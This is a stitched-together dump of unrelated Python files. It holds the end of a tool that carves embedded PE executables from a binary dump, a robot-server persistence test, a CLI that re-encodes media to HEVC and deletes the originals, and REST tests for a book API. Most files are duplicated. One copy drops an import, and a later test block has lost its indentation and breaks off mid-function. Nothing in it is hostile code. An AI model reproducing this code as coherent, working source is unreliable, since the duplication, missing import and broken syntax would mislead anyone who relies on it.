    sizes each candidate via its section table, and writes plausible hits
    to ``<output>/<name>_<offset>.livebin``.
    """
    args = getArgs()
    if args.output:
        if not file_exists(args.output):
            print('[!] Output folder does not exist: {}'.format(args.output))
            sys.exit(1)
        output_folder = args.output
    else:
        output_folder = '.'
    start_stamp = datetime.now().strftime('[%d %b %y @ %H:%M:%S]')
    log('Scan started on %s at %s' % (args.file, start_stamp))
    entries = []
    fstream = bitstring.ConstBitStream(filename=args.file)
    # A str beginning with '0x' is parsed by bitstring as a hex pattern;
    # the old b'0x54...' bytes literal searched for the ASCII characters
    # of the hex string itself and could never match.
    results = fstream.findall('0x546869732070726F6772616D')  # 'This program'
    log('Gathering search hits...')
    for i in results:
        # Offsets are in bits, so floor-divide by 8 (true division gave a
        # float on Python 3, which file.seek() rejects); 'This program'
        # sits 78 bytes past the 'MZ' signature.
        hit = int(i) // 8 - 78
        entries.append(hit)
    log('Parsing EXEs...')
    with open(args.file, 'rb') as ifile:
        for hit in entries:
            ifile.seek(hit)
            PE_header = ifile.read(1024)
            pesize = getSize_FromPE(PE_header)
            # These size bounds are arbitrary: numerous junk PE headers
            # (>30GB) forced basic limiting. b'MZ' (not 'MZ'): the header
            # is bytes, and bytes never equal str on Python 3.
            if (10000 < pesize < 2000000) and PE_header[0:2] == b'MZ':
                log('Found at: 0x%X (%d bytes)' % (hit, pesize))
                ifile.seek(hit)
                PE_data = ifile.read(pesize)
                # basename() after normalizing separators works for both
                # Windows and POSIX paths; splitting on '\\' alone left '/'
                # in the name and broke os.path.join on POSIX.
                base_name = os.path.basename(args.file.replace('\\', '/'))
                outfile = os.path.join(output_folder, '%s_%X.livebin' % (base_name, hit))
                with open(outfile, 'wb') as out:
                    out.write(PE_data)
            else:
                log('Ignored PE header at 0x%X' % hit)
    end_stamp = datetime.now().strftime('[%d %b %y @ %H:%M:%S]')
    log('Scan ended on %s at %s' % (args.file, end_stamp))


if __name__ == '__main__':
    main()
import os
import pytest
import secrets
from typing import Callable, IO
from pathlib import Path
from tests.integration.dev_server import DevServer
from tests.integration.robot_client import RobotClient
from tests.integration.protocol_files import get_py_protocol, get_json_protocol
@pytest.mark.parametrize("protocol", [(get_py_protocol), (get_json_protocol)])
async def test_upload_protocols_and_reset_persistence_dir(
    protocol: Callable[[str], IO[bytes]]
) -> None:
    """Test protocol and analysis persistence.

    After a runsHistory reset, uploaded protocols should survive until the
    server restarts, then be gone from both the API and the persistence dir.
    """
    port = "15555"
    async with RobotClient.make(
        host="http://localhost", port=port, version="*"
    ) as robot_client:
        assert (
            await robot_client.wait_until_dead()
        ), "Dev Robot is running and must not be."
        with DevServer(port=port) as server:
            server.start()
            assert (
                await robot_client.wait_until_alive()
            ), "Dev Robot never became available."
            # Keep this low enough that the server never runs out of room
            # and starts auto-deleting old protocols.
            for _ in range(15):
                with protocol(secrets.token_urlsafe(16)) as proto_file:
                    await robot_client.post_protocol([Path(proto_file.name)])
            # NOTE(review): reset assumed to happen once, after the upload
            # loop — indentation was ambiguous in the original dump.
            await robot_client.post_setting_reset_options({"runsHistory": True})
            before_restart = await robot_client.get_protocols()
            assert before_restart.json()["data"]
            assert os.listdir(f"{server.persistence_directory}/protocols/")
            server.stop()
            assert await robot_client.wait_until_dead(), "Dev Robot did not stop."
            server.start()
            assert (
                await robot_client.wait_until_alive()
            ), "Dev Robot never became available."
            after_restart = await robot_client.get_protocols()
            assert after_restart.json()["data"] == []
            assert os.listdir(f"{server.persistence_directory}/protocols/") == []
            server.stop()
import pytest
import secrets
from typing import Callable, IO
from pathlib import Path
from tests.integration.dev_server import DevServer
from tests.integration.robot_client import RobotClient
from tests.integration.protocol_files import get_py_protocol, get_json_protocol
@pytest.mark.parametrize("protocol", [(get_py_protocol), (get_json_protocol)])
async def test_upload_protocols_and_reset_persistence_dir(
    protocol: Callable[[str], IO[bytes]]
) -> None:
    """Test protocol and analysis persistence.

    After a runsHistory reset, uploaded protocols should survive until the
    server restarts, then be gone from both the API and the persistence dir.
    """
    port = "15555"
    async with RobotClient.make(
        host="http://localhost", port=port, version="*"
    ) as robot_client:
        assert (
            await robot_client.wait_until_dead()
        ), "Dev Robot is running and must not be."
        with DevServer(port=port) as server:
            server.start()
            assert (
                await robot_client.wait_until_alive()
            ), "Dev Robot never became available."
            # Keep this low enough that the server never runs out of room
            # and starts auto-deleting old protocols.
            for _ in range(15):
                with protocol(secrets.token_urlsafe(16)) as proto_file:
                    await robot_client.post_protocol([Path(proto_file.name)])
            # NOTE(review): reset assumed to happen once, after the upload
            # loop — indentation was ambiguous in the original dump.
            await robot_client.post_setting_reset_options({"runsHistory": True})
            before_restart = await robot_client.get_protocols()
            assert before_restart.json()["data"]
            assert os.listdir(f"{server.persistence_directory}/protocols/")
            server.stop()
            assert await robot_client.wait_until_dead(), "Dev Robot did not stop."
            server.start()
            assert (
                await robot_client.wait_until_alive()
            ), "Dev Robot never became available."
            after_restart = await robot_client.get_protocols()
            assert after_restart.json()["data"] == []
            assert os.listdir(f"{server.persistence_directory}/protocols/") == []
            server.stop()
import typer
from pathlib import Path
import filetype
import os
import shutil
from typer.colors import RED, GREEN
import enlighten
import ffmpeg
from utils import convertion_path, get_codec, check_ignore
from base_video_diet import convert_file, convert_video_progress_bar
def folder(path: Path = typer.Argument(
    default='.',
    exists=True,
    file_okay=True,
    dir_okay=True,
    readable=True,
    resolve_path=True
), ignore_extension: str = typer.Option(
    default=None
), ignore_path: Path = typer.Option(
    default=None,
    exists=True,
    file_okay=True,
    dir_okay=True,
    readable=True,
    resolve_path=True
)):
    """
    Convert all videos and audios in a folder
    """
    # First pass: walk the tree and classify every file by MIME sniffing.
    videos = []
    audios = []
    for current_dir, _subdirs, filenames in os.walk(path):
        base_dir = Path(current_dir)
        for name in filenames:
            candidate = base_dir / name
            guess = filetype.guess(str(candidate))
            if check_ignore(candidate, ignore_extension, ignore_path):
                continue
            if guess and 'video' in guess.mime:
                videos.append(candidate)
            if guess and 'audio' in guess.mime:
                audios.append(candidate)
    manager = enlighten.get_manager()
    errors_files = []
    pbar = manager.counter(total=len(videos) + len(audios), desc='Files', unit='files')
    # Second pass: re-encode anything that is not already HEVC.
    for video in videos:
        typer.secho(f'Processing: {video}')
        if get_codec(str(video)) != 'hevc':
            new_path = convertion_path(video, False)
            if new_path.exists():
                os.remove(str(new_path))
            try:
                convert_video_progress_bar(str(video), str(new_path), manager)
                os.remove(str(video))
                # Keep the original name when the container did not change.
                if video.suffix == new_path.suffix:
                    shutil.move(new_path, str(video))
            except ffmpeg._run.Error:
                typer.secho(f'ffmpeg could not process: {str(video)}', fg=RED)
                errors_files.append(video)
        # NOTE(review): bar assumed to tick once per file whether or not it
        # was converted — indentation was ambiguous in the original dump.
        pbar.update()
    for audio in audios:
        typer.secho(f'Processing: {audio}')
        if get_codec(str(audio)) != 'hevc':
            new_path = convertion_path(audio, True)
            if new_path.exists():
                os.remove(str(new_path))
            try:
                convert_file(str(audio), str(new_path))
                os.remove(str(audio))
                if audio.suffix == new_path.suffix:
                    shutil.move(new_path, str(audio))
            except ffmpeg._run.Error:
                typer.secho(f'ffmpeg could not process this file: {str(audio)}', fg=RED)
                errors_files.append(audio)
        pbar.update()
    if errors_files:
        typer.secho('This files could not be processed:', fg=RED)
        typer.secho(str(errors_files), fg=RED)
def file(path: Path = typer.Argument(
    default=None,
    exists=True,
    file_okay=True,
    dir_okay=False,
    readable=True,
    resolve_path=True
)):
    """
    Convert a file
    """
    if path is None:
        typer.secho('Please write the video or audio path', fg=RED)
        return
    # Anything that does not sniff as video is treated as audio.
    guess = filetype.guess(str(path))
    is_audio = not (guess and 'video' in guess.mime)
    conv_path = convertion_path(path, is_audio)
    if conv_path.exists():
        typer.secho('The destination file already exist, \
please delete it', fg=RED)
        return
    if get_codec(str(path)) == 'hevc':
        typer.secho('This file codec is already \'hevc\'', fg=GREEN)
        return
    try:
        convert_video_progress_bar(str(path), str(conv_path))
    except FileNotFoundError as error:
        # A missing 'ffmpeg' executable surfaces as FileNotFoundError.
        if error.filename == 'ffmpeg':
            readme_url = 'https://github.com/hiancdtrsnm/video-diet#FFMPEG'
            typer.secho('It seems you don\'t have ffmpeg installed', fg=RED)
            typer.secho(f'Check FFMPEG secction on {readme_url}', fg=RED)
        else:
            raise error
from pathlib import Path
import filetype
import os
import shutil
from typer.colors import RED, GREEN
import enlighten
import ffmpeg
from utils import convertion_path, get_codec, check_ignore
from base_video_diet import convert_file, convert_video_progress_bar
def folder(path: Path = typer.Argument(
    default='.',
    exists=True,
    file_okay=True,
    dir_okay=True,
    readable=True,
    resolve_path=True
), ignore_extension: str = typer.Option(
    default=None
), ignore_path: Path = typer.Option(
    default=None,
    exists=True,
    file_okay=True,
    dir_okay=True,
    readable=True,
    resolve_path=True
)):
    """
    Convert all videos and audios in a folder
    """
    # First pass: walk the tree and classify every file by MIME sniffing.
    videos = []
    audios = []
    for current_dir, _subdirs, filenames in os.walk(path):
        base_dir = Path(current_dir)
        for name in filenames:
            candidate = base_dir / name
            guess = filetype.guess(str(candidate))
            if check_ignore(candidate, ignore_extension, ignore_path):
                continue
            if guess and 'video' in guess.mime:
                videos.append(candidate)
            if guess and 'audio' in guess.mime:
                audios.append(candidate)
    manager = enlighten.get_manager()
    errors_files = []
    pbar = manager.counter(total=len(videos) + len(audios), desc='Files', unit='files')
    # Second pass: re-encode anything that is not already HEVC.
    for video in videos:
        typer.secho(f'Processing: {video}')
        if get_codec(str(video)) != 'hevc':
            new_path = convertion_path(video, False)
            if new_path.exists():
                os.remove(str(new_path))
            try:
                convert_video_progress_bar(str(video), str(new_path), manager)
                os.remove(str(video))
                # Keep the original name when the container did not change.
                if video.suffix == new_path.suffix:
                    shutil.move(new_path, str(video))
            except ffmpeg._run.Error:
                typer.secho(f'ffmpeg could not process: {str(video)}', fg=RED)
                errors_files.append(video)
        # NOTE(review): bar assumed to tick once per file whether or not it
        # was converted — indentation was ambiguous in the original dump.
        pbar.update()
    for audio in audios:
        typer.secho(f'Processing: {audio}')
        if get_codec(str(audio)) != 'hevc':
            new_path = convertion_path(audio, True)
            if new_path.exists():
                os.remove(str(new_path))
            try:
                convert_file(str(audio), str(new_path))
                os.remove(str(audio))
                if audio.suffix == new_path.suffix:
                    shutil.move(new_path, str(audio))
            except ffmpeg._run.Error:
                typer.secho(f'ffmpeg could not process this file: {str(audio)}', fg=RED)
                errors_files.append(audio)
        pbar.update()
    if errors_files:
        typer.secho('This files could not be processed:', fg=RED)
        typer.secho(str(errors_files), fg=RED)
def file(path: Path = typer.Argument(
    default=None,
    exists=True,
    file_okay=True,
    dir_okay=False,
    readable=True,
    resolve_path=True
)):
    """
    Convert a file
    """
    if path is None:
        typer.secho('Please write the video or audio path', fg=RED)
        return
    # Anything that does not sniff as video is treated as audio.
    guess = filetype.guess(str(path))
    is_audio = not (guess and 'video' in guess.mime)
    conv_path = convertion_path(path, is_audio)
    if conv_path.exists():
        typer.secho('The destination file already exist, \
please delete it', fg=RED)
        return
    if get_codec(str(path)) == 'hevc':
        typer.secho('This file codec is already \'hevc\'', fg=GREEN)
        return
    try:
        convert_video_progress_bar(str(path), str(conv_path))
    except FileNotFoundError as error:
        # A missing 'ffmpeg' executable surfaces as FileNotFoundError.
        if error.filename == 'ffmpeg':
            readme_url = 'https://github.com/hiancdtrsnm/video-diet#FFMPEG'
            typer.secho('It seems you don\'t have ffmpeg installed', fg=RED)
            typer.secho(f'Check FFMPEG secction on {readme_url}', fg=RED)
        else:
            raise error
from book_api.models.book import Book
from book_api.models.user import User
from book_api.tests.conftest import FAKE
def test_signup_other_methods_gets_404_status_code(testapp):
    """Test that other HTTP method requests to signup get a 404 status code."""
    for method in ('get', 'put', 'delete'):
        res = getattr(testapp, method)('/signup', status=404)
        assert res.status_code == 404


def test_signup_post_no_data_gets_400_status_code(testapp):
    """Test that POST to signup route gets 400 status code with no data."""
    res = testapp.post('/signup', status=400)
    assert res.status_code == 400


def test_signup_post_incomplete_data_gets_400_status_code(testapp):
    """Test that POST to signup route gets 400 status code for bad data."""
    # 'email' is deliberately omitted, so signup must be rejected.
    # `<PASSWORD>()` redaction placeholders restored as FAKE.password().
    data = {
        'first_name': FAKE.first_name(),
        'last_name': FAKE.last_name(),
        'password': FAKE.password()
    }
    res = testapp.post('/signup', data, status=400)
    assert res.status_code == 400


def test_signup_post_complete_data_adds_user_to_database(testapp, testapp_session):
    """Test that POST to signup route creates a new User."""
    assert len(testapp_session.query(User).all()) == 0
    data = {
        'first_name': FAKE.first_name(),
        'last_name': FAKE.last_name(),
        'email': FAKE.email(),
        'password': FAKE.password()
    }
    testapp.post('/signup', data)
    assert len(testapp_session.query(User).all()) == 1


def test_signup_post_complete_data_gets_201_status_code(testapp):
    """Test that POST to signup route gets 201 status code."""
    data = {
        'first_name': FAKE.first_name(),
        'last_name': FAKE.last_name(),
        'email': FAKE.email(),
        'password': FAKE.password()
    }
    res = testapp.post('/signup', data)
    assert res.status_code == 201


def test_signup_post_complete_data_returns_json_with_new_user_info(testapp):
    """Test that POST to signup route gets JSON with details for new User."""
    data = {
        'first_name': FAKE.first_name(),
        'last_name': FAKE.last_name(),
        'email': FAKE.email(),
        'password': FAKE.password()
    }
    res = testapp.post('/signup', data)
    for prop in ['first_name', 'last_name', 'email']:
        assert res.json[prop] == data[prop]
    assert res.json['id'] is not None


def test_signup_post_data_without_names_sets_names_to_none(testapp):
    """Test that POST to signup route sets first and last names to None."""
    data = {
        'email': FAKE.email(),
        'password': FAKE.password()
    }
    res = testapp.post('/signup', data)
    assert res.json['first_name'] is None
    assert res.json['last_name'] is None
def test_book_list_other_methods_gets_404_status_code(testapp):
    """Test that other HTTP method requests to book-list get a 404 status code."""
    for method in ('put', 'delete'):
        res = getattr(testapp, method)('/books', status=404)
        assert res.status_code == 404


def test_book_list_get_missing_auth_gets_400_status_code(testapp, testapp_session, one_user, fill_the_db):
    """Test that GET to book-list route gets 400 status code for missing auth."""
    testapp_session.add(one_user)
    testapp_session.commit()
    res = testapp.get('/books', status=400)
    assert res.status_code == 400


def test_book_list_get_incorrect_auth_gets_403_status_code(testapp, one_user):
    """Test that GET to book-list route gets 403 status code for bad auth."""
    credentials = {
        'email': one_user.email,
        'password': '<PASSWORD>',
    }
    res = testapp.get('/books', credentials, status=403)
    assert res.status_code == 403


def test_book_list_get_correct_auth_has_200_response_code(testapp, one_user):
    """Test that GET to book-list route gets 200 status code for good auth."""
    credentials = {
        'email': one_user.email,
        'password': 'password',
    }
    res = testapp.get('/books', credentials)
    assert res.status_code == 200


def test_book_list_get_correct_auth_empty_for_user_with_no_books(testapp, one_user):
    """Test that GET to book-list route returns empty list for user without books."""
    credentials = {
        'email': one_user.email,
        'password': 'password',
    }
    res = testapp.get('/books', credentials)
    assert res.json == []


def test_book_list_post_no_data_gets_400_status_code(testapp):
    """Test that POST to book-list route gets 400 status code with no data."""
    res = testapp.post('/books', status=400)
    assert res.status_code == 400


def test_book_list_post_missing_auth_gets_400_status_code(testapp):
    """Test that POST to book-list route gets 400 status code for missing auth."""
    payload = {
        'title': FAKE.sentence(nb_words=3),
        'author': FAKE.name(),
        'isbn': FAKE.isbn13(separator="-"),
        'pub_date': FAKE.date(pattern='%m/%d/%Y')
    }
    res = testapp.post('/books', payload, status=400)
    assert res.status_code == 400


def test_book_list_post_incorrect_auth_gets_403_status_code(testapp, one_user):
    """Test that POST to book-list route gets 403 status code for bad auth."""
    payload = {
        'email': one_user.email,
        'password': '<PASSWORD>',
        'title': FAKE.sentence(nb_words=3),
        'author': FAKE.name(),
        'isbn': FAKE.isbn13(separator="-"),
        'pub_date': FAKE.date(pattern='%m/%d/%Y')
    }
    res = testapp.post('/books', payload, status=403)
    assert res.status_code == 403


def test_book_list_post_incomplete_data_gets_400_status_code(testapp, one_user):
    """Test that POST to book-list route gets 400 status code for missing data."""
    # 'title' is deliberately omitted.
    payload = {
        'email': one_user.email,
        'password': 'password',
        'author': FAKE.name(),
        'isbn': FAKE.isbn13(separator="-"),
        'pub_date': FAKE.date(pattern='%m/%d/%Y')
    }
    res = testapp.post('/books', payload, status=400)
    assert res.status_code == 400


def test_book_list_post_incorrect_date_gets_400_status_code(testapp, one_user):
    """Test that POST to book-list route gets 400 status code for bad data."""
    # The API expects MM/DD/YYYY; an ISO-formatted date must be rejected.
    payload = {
        'email': one_user.email,
        'password': 'password',
        'title': FAKE.sentence(nb_words=3),
        'author': FAKE.name(),
        'isbn': FAKE.isbn13(separator="-"),
        'pub_date': FAKE.date(pattern='%Y-%m-%d')
    }
    res = testapp.post('/books', payload, status=400)
    assert res.status_code == 400


def test_book_list_post_complete_data_gets_201_status_code(testapp, one_user):
    """Test that POST to book-list route gets 201 status code."""
    payload = {
        'email': one_user.email,
        'password': 'password',
        'title': FAKE.sentence(nb_words=3),
        'author': FAKE.name(),
        'isbn': FAKE.isbn13(separator="-"),
        'pub_date': FAKE.date(pattern='%m/%d/%Y')
    }
    res = testapp.post('/books', payload)
    assert res.status_code == 201


def test_book_list_post_complete_data_adds_book_to_database(testapp, testapp_session, one_user):
    """Test that POST to book-list route creates a new Book."""
    num_books = len(testapp_session.query(Book).all())
    payload = {
        'email': one_user.email,
        'password': 'password',
        'title': FAKE.sentence(nb_words=3),
        'author': FAKE.name(),
        'isbn': FAKE.isbn13(separator="-"),
        'pub_date': FAKE.date(pattern='%m/%d/%Y')
    }
    testapp.post('/books', payload)
    assert len(testapp_session.query(Book).all()) == num_books + 1


def test_book_list_post_sets_email_user_as_book_owner(testapp, testapp_session, one_user):
    """Test that POST to book-list route sets user with email as book owner."""
    payload = {
        'email': one_user.email,
        'password': 'password',
        'title': FAKE.sentence(nb_words=3),
        'author': FAKE.name(),
        'isbn': FAKE.isbn13(separator="-"),
        'pub_date': FAKE.date(pattern='%m/%d/%Y')
    }
    res = testapp.post('/books', payload)
    new_book = testapp_session.query(Book).get(res.json['id'])
    assert new_book.user.email == one_user.email


def test_book_list_post_complete_data_returns_json_with_new_book_info(testapp, one_user):
    """Test that POST to book-list route gets JSON with details for new Book."""
    payload = {
        'email': one_user.email,
        'password': 'password',
        'title': FAKE.sentence(nb_words=3),
        'author': FAKE.name(),
        'isbn': FAKE.isbn13(separator="-"),
        'pub_date': FAKE.date(pattern='%m/%d/%Y')
    }
    res = testapp.post('/books', payload)
    for prop in ['title', 'author', 'isbn', 'pub_date']:
        assert res.json[prop] == payload[prop]
    assert res.json['id'] is not None


def test_book_list_post_data_without_values_sets_values_to_none(testapp, one_user):
    """Test that POST to book-list route sets missing values to None."""
    payload = {
        'email': one_user.email,
        'password': 'password',
        'title': FAKE.sentence(nb_words=3),
    }
    res = testapp.post('/books', payload)
    assert res.json['author'] is None
    assert res.json['isbn'] is None
    assert res.json['pub_date'] is None


def test_book_list_get_correct_auth_all_books_for_user(testapp, testapp_session, one_user):
    """Test that GET to book-list route lists all books for the users."""
    credentials = {
        'email': one_user.email,
        'password': 'password',
    }
    res = testapp.get('/books', credentials)
    user_books = testapp_session.query(User).get(one_user.id).books
    assert len(res.json) == len(user_books)


def test_book_list_get_correct_auth_all_book_details(testapp, one_user):
    """Test that GET to book-list route has details for every book."""
    credentials = {
        'email': one_user.email,
        'password': 'password',
    }
    res = testapp.get('/books', credentials)
    for book in res.json:
        assert all(prop in book for prop in
                   ['id', 'title', 'author', 'isbn', 'pub_date'])
def test_book_id_other_methods_gets_404_status_code(testapp):
    """Test that other HTTP method requests to book-id get a 404 status code."""
    for method in ('post',):
        res = getattr(testapp, method)('/books/1', status=404)
        assert res.status_code == 404


def test_book_id_get_missing_auth_gets_400_status_code(testapp, testapp_session, one_user):
    """Test that GET to book-id route gets 400 status code for missing auth."""
    res = testapp.get('/books/1', status=400)
    assert res.status_code == 400


def test_book_id_get_incorrect_auth_gets_403_status_code(testapp, one_user):
    """Test that GET to book-id route gets 403 status code for bad auth."""
    credentials = {
        'email': one_user.email,
        'password': '<PASSWORD>',
    }
    res = testapp.get('/books/1', credentials, status=403)
    assert res.status_code == 403


def test_book_id_get_correct_auth_not_users_book_gets_404_status_code(testapp, testapp_session, one_user):
    """Test that GET to book-id route gets 404 status code for a book that does not belong to the user."""
    book = testapp_session.query(Book).filter(Book.user_id != one_user.id).first()
    credentials = {
        'email': one_user.email,
        'password': 'password',
    }
    res = testapp.get('/books/{}'.format(book.id), credentials, status=404)
    assert res.status_code == 404


def test_book_id_get_correct_auth_has_200_response_code(testapp, testapp_session, one_user):
    """Test that GET to book-id route gets 200 status code for good auth."""
    book = testapp_session.query(User).get(one_user.id).books[0]
    credentials = {
        'email': one_user.email,
        'password': 'password',
    }
    res = testapp.get('/books/{}'.format(book.id), credentials)
    assert res.status_code == 200


def test_book_id_get_correct_auth_returns_json_with_book_info(testapp, testapp_session, one_user):
    """Test that GET to book-id route return JSON with correct book data."""
    book = testapp_session.query(User).get(one_user.id).books[0]
    credentials = {
        'email': one_user.email,
        'password': 'password',
    }
    res = testapp.get('/books/{}'.format(book.id), credentials)
    for prop in ['id', 'title', 'author', 'isbn']:
        assert res.json[prop] == getattr(book, prop)
    # pub_date is serialized as MM/DD/YYYY.
    assert res.json['pub_date'] == book.pub_date.strftime('%m/%d/%Y')


def test_book_id_put_missing_auth_gets_400_status_code(testapp, testapp_session, one_user):
    """Test that PUT to book-id route gets 400 status code for missing auth."""
    res = testapp.put('/books/1', status=400)
    assert res.status_code == 400


def test_book_id_put_incorrect_auth_gets_403_status_code(testapp, one_user):
    """Test that PUT to book-id route gets 403 status code for bad auth."""
    credentials = {
        'email': one_user.email,
        'password': '<PASSWORD>',
    }
    res = testapp.put('/books/1', credentials, status=403)
    assert res.status_code == 403


def test_book_id_put_correct_auth_not_users_book_gets_404_status_code(testapp, testapp_session, one_user):
    """Test that PUT to book-id route gets 404 status code for a book that does not belong to the user."""
    book = testapp_session.query(Book).filter(Book.user_id != one_user.id).first()
    credentials = {
        'email': one_user.email,
        'password': 'password',
    }
    res = testapp.put('/books/{}'.format(book.id), credentials, status=404)
    assert res.status_code == 404


def test_book_id_put_correct_auth_incorrect_date_gets_400_status_code(testapp, testapp_session, one_user):
    """Test that PUT to book-id route gets 400 status code for bad data."""
    book = testapp_session.query(User).get(one_user.id).books[0]
    payload = {
        'email': one_user.email,
        'password': 'password',
        'pub_date': FAKE.date(pattern='%Y-%m-%d')
    }
    res = testapp.put('/books/{}'.format(book.id), payload, status=400)
    assert res.status_code == 400


def test_book_id_put_correct_auth_has_200_response_code(testapp, testapp_session, one_user):
    """Test that PUT to book-id route gets 200 status code for good auth."""
    book = testapp_session.query(User).get(one_user.id).books[0]
    payload = {
        'email': one_user.email,
        'password': 'password',
        'author': FAKE.name()
    }
    res = testapp.put('/books/{}'.format(book.id), payload)
    assert res.status_code == 200


def test_book_id_put_correct_auth_does_not_add_book_to_database(testapp, testapp_session, one_user):
    """Test that PUT to book-id route does not create a new Book."""
    book = testapp_session.query(User).get(one_user.id).books[0]
    num_books = len(testapp_session.query(Book).all())
    payload = {
        'email': one_user.email,
        'password': 'password',
        'isbn': FAKE.isbn13(separator="-")
    }
    testapp.put('/books/{}'.format(book.id), payload)
    assert len(testapp_session.query(Book).all()) == num_books


def test_book_id_put_correct_auth_updates_book_in_database(testapp, testapp_session, one_user):
    """Test that PUT to book-id route updates the correct book in the database."""
    book = testapp_session.query(User).get(one_user.id).books[0]
    payload = {
        'email': one_user.email,
        'password': 'password',
        'author': FAKE.name()
    }
    testapp.put('/books/{}'.format(book.id), payload)
    updated_book = testapp.get('/books/{}'.format(book.id), payload)
    assert updated_book.json['author'] == payload['author']


def test_book_id_put_correct_auth_returns_json_with_updated_book_info(testapp, testapp_session, one_user):
    """Test that PUT to book-id route returns JSON with updated book data."""
    book = testapp_session.query(User).get(one_user.id).books[0]
    payload = {
        'email': one_user.email,
        'password': 'password',
        'author': FAKE.name(),
        'isbn': FAKE.isbn13(separator="-"),
        'pub_date': FAKE.date(pattern='%m/%d/%Y')
    }
    res = testapp.put('/books/{}'.format(book.id), payload)
    for prop in ['id', 'title', 'author', 'isbn', 'pub_date']:
        if prop in payload:
            assert res.json[prop] == payload[prop]
        else:
            assert res.json[prop] == getattr(book, prop)


def test_book_id_delete_missing_auth_gets_400_status_code(testapp, testapp_session, one_user):
    """Test that DELETE to book-id route gets 400 status code for missing auth."""
    res = testapp.delete('/books/1', status=400)
    assert res.status_code == 400


def test_book_id_delete_incorrect_auth_gets_403_status_code(testapp, one_user):
    """Test that DELETE to book-id route gets 403 status code for bad auth."""
    credentials = {
        'email': one_user.email,
        'password': '<PASSWORD>'
    }
    res = testapp.delete('/books/1', credentials, status=403)
    assert res.status_code == 403


def test_book_id_delete_correct_auth_not_users_book_gets_404_status_code(testapp, testapp_session, one_user):
    """Test that DELETE to book-id route gets 404 status code for a book that does not belong to the user."""
    book = testapp_session.query(Book).filter(Book.user_id != one_user.id).first()
    credentials = {
        'email': one_user.email,
        'password': 'password'
    }
    res = testapp.delete('/books/{}'.format(book.id), credentials, status=404)
    assert res.status_code == 404


def test_book_id_delete_correct_auth_has_204_response_code(testapp, testapp_session, one_user):
    """Test that DELETE to book-id route gets 204 status code for good auth."""
    book = testapp_session.query(User).get(one_user.id).books[0]
    credentials = {
        'email': one_user.email,
        'password': 'password'
    }
    res = testapp.delete('/books/{}'.format(book.id), credentials)
    assert res.status_code == 204


def test_book_id_delete_correct_auth_removes_book_from_database(testapp, testapp_session, one_user):
    """Test that DELETE to book-id route removes the Book from the database."""
    book = testapp_session.query(User).get(one_user.id).books[0]
    num_books = len(testapp_session.query(Book).all())
    credentials = {
        'email': one_user.email,
        'password': 'password'
    }
    testapp.delete('/books/{}'.format(book.id), credentials)
    assert len(testapp_session.query(Book).all()) == num_books - 1


def test_book_id_delete_correct_auth_removes_book_by_id(testapp, testapp_session, one_user):
    """Test that DELETE to book-id route removes the correct Book by id."""
    book = testapp_session.query(User).get(one_user.id).books[0]
    book_id = book.id
    credentials = {
        'email': one_user.email,
        'password': 'password'
    }
    res = testapp.get('/books/{}'.format(book_id), credentials)
    assert res.status_code == 200
    testapp.delete('/books/{}'.format(book_id), credentials)
    res = testapp.get('/books/{}'.format(book_id), credentials, status=404)
    assert res.status_code == 404
from book_api.models.book import Book
from book_api.models.user import User
from book_api.tests.conftest import FAKE
def test_signup_other_methods_gets_404_status_code(testapp):
    """Test that other HTTP method requests to signup get a 404 status code."""
    for method in ('get', 'put', 'delete'):
        res = getattr(testapp, method)('/signup', status=404)
        assert res.status_code == 404


def test_signup_post_no_data_gets_400_status_code(testapp):
    """Test that POST to signup route gets 400 status code with no data."""
    res = testapp.post('/signup', status=400)
    assert res.status_code == 400


def test_signup_post_incomplete_data_gets_400_status_code(testapp):
    """Test that POST to signup route gets 400 status code for bad data."""
    # 'email' is deliberately omitted, so signup must be rejected.
    # `<PASSWORD>()` redaction placeholders restored as FAKE.password().
    data = {
        'first_name': FAKE.first_name(),
        'last_name': FAKE.last_name(),
        'password': FAKE.password()
    }
    res = testapp.post('/signup', data, status=400)
    assert res.status_code == 400


def test_signup_post_complete_data_adds_user_to_database(testapp, testapp_session):
    """Test that POST to signup route creates a new User."""
    assert len(testapp_session.query(User).all()) == 0
    data = {
        'first_name': FAKE.first_name(),
        'last_name': FAKE.last_name(),
        'email': FAKE.email(),
        'password': FAKE.password()
    }
    testapp.post('/signup', data)
    assert len(testapp_session.query(User).all()) == 1


def test_signup_post_complete_data_gets_201_status_code(testapp):
    """Test that POST to signup route gets 201 status code."""
    data = {
        'first_name': FAKE.first_name(),
        'last_name': FAKE.last_name(),
        'email': FAKE.email(),
        'password': FAKE.password()
    }
    res = testapp.post('/signup', data)
    assert res.status_code == 201


def test_signup_post_complete_data_returns_json_with_new_user_info(testapp):
    """Test that POST to signup route gets JSON with details for new User."""
    data = {
        'first_name': FAKE.first_name(),
        'last_name': FAKE.last_name(),
        'email': FAKE.email(),
        'password': FAKE.password()
    }
    res = testapp.post('/signup', data)
    for prop in ['first_name', 'last_name', 'email']:
        assert res.json[prop] == data[prop]
    assert res.json['id'] is not None


def test_signup_post_data_without_names_sets_names_to_none(testapp):
    """Test that POST to signup route sets first and last names to None."""
    data = {
        'email': FAKE.email(),
        'password': FAKE.password()
    }
    res = testapp.post('/signup', data)
    assert res.json['first_name'] is None
    assert res.json['last_name'] is None
def test_book_list_other_methods_gets_404_status_code(testapp):
"""Test that other HTTP method requests to book-list get a 404 status code."""
for method in ('put', 'delete'):
res = getattr(testapp, method)('/books', status=404)
assert res.status_code == 404
def test_book_list_get_missing_auth_gets_400_status_code(testapp, testapp_session, one_user, fill_the_db):
    """GET /books without any credentials is rejected with 400."""
    testapp_session.add(one_user)
    testapp_session.commit()
    response = testapp.get('/books', status=400)
    assert response.status_code == 400
def test_book_list_get_incorrect_auth_gets_403_status_code(testapp, one_user):
    """Test that GET to book-list route gets 403 status code for bad auth."""
    data = {
        'email': one_user.email,
        # Fix: '<PASSWORD>' is a redaction artifact; any value different from
        # the fixture's real password ('password') exercises the 403 branch.
        'password': 'not-the-password',
    }
    res = testapp.get('/books', data, status=403)
    assert res.status_code == 403
def test_book_list_get_correct_auth_has_200_response_code(testapp, one_user):
    """GET /books with valid credentials succeeds with 200."""
    credentials = dict(email=one_user.email, password='password')
    response = testapp.get('/books', credentials)
    assert response.status_code == 200
def test_book_list_get_correct_auth_empty_for_user_with_no_books(testapp, one_user):
    """A user that owns no books gets back an empty JSON list."""
    credentials = dict(email=one_user.email, password='password')
    response = testapp.get('/books', credentials)
    assert response.json == []
def test_book_list_post_no_data_gets_400_status_code(testapp):
    """POST /books with an empty body is rejected with 400."""
    response = testapp.post('/books', status=400)
    assert response.status_code == 400
def test_book_list_post_missing_auth_gets_400_status_code(testapp):
